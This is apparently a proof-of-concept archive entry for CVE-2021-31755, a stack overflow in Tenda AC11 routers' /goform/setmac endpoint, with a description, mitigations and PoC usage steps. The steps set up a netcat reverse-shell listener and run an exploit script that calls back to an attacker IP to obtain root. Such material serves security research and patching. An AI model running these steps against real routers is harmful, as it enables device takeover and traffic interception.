关联漏洞
标题:
Tenda AC11 缓冲区错误漏洞
(CVE-2021-31755)
描述:Tenda AC11是中国腾达(Tenda)公司的一款路由器。 Tenda AC11 devices with firmware 02.03.01.104_CN版本及之前版本存在安全漏洞,该漏洞源于/goform/setmac,攻击者可利用该漏洞通过一个精心制作的post请求在系统上执行任意代码。
描述
POC cve-2021-31755
介绍
# CVE-2021-31755
The issue is a **stack buffer overflow vulnerability** discovered in **Tenda AC11 routers**, with firmware versions through **02.03.01.104_CN**.
This type of vulnerability, if exploited, allows attackers to execute arbitrary code on the affected device. Here's a breakdown of this CVE based on the description:
## Vulnerability Overview
- **CVE Identifier:** CVE-2021-31755 (or a related vulnerability if you're referring to a Tenda-specific issue)
- **Vulnerability Type:** Stack Buffer Overflow
- **Affected Device:** Tenda AC11 Router
- **Firmware Affected:** Through version 02.03.01.104_CN
- **Attack Vector:** A **crafted POST request** to the `/goform/setmac` endpoint
## Description
This vulnerability exists due to improper handling of user input in the **/goform/setmac** endpoint of the Tenda AC11 firmware.
Specifically, there is a stack buffer overflow, which occurs when an attacker sends an excessively large payload to this endpoint in a POST request.
Since the application does not properly validate or limit the size of the input, it overwrites critical memory areas in the stack.
When this happens, an attacker can manipulate the memory in such a way that they gain control of the **instruction pointer**,
which allows them to execute arbitrary code on the device. The impact of such code execution can range from complete takeover of the router, changing its settings,
spying on traffic, or even launching further attacks on devices connected to the network.
## Exploit Details
- **Attack Method:** The attacker sends a specially crafted POST request to the vulnerable `/goform/setmac` endpoint.
- **Required Access:** The attacker would need network access to the router to exploit this vulnerability.
- **Potential Impact:** Code execution, system control, and further network compromise.
## Mitigation
To mitigate this vulnerability:
1. **Update Firmware:** Tenda has likely released a patch to address this vulnerability in a newer version of the firmware. Users should check for updates and install the latest firmware.
2. **Restrict Access:** If an update is not available or cannot be applied immediately, restrict access to the router’s management interface from untrusted networks.
3. **Use Network-Level Protections:** Employ firewalls and network segmentation to limit exposure of the vulnerable router to the broader internet.
# POC
Run reverse shell listener
```bash
nc -lvp local_port
```
Execute `poc.sh`:
```bash
bash poc.sh remote_url local_ip local_port
```
* _remote_url_ is vulnerable url
* _local_ip_ is an attacker machine IP
* _local_port_ is an attacker machine port
If the exploit succeeds, root access should be granted.
文件快照
[4.0K] /data/pocs/5e7bd7e17cf340ca299ac8c9f594a3d1498aa25d
├── [ 39K] payload.bin
├── [ 593] poc.sh
└── [2.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。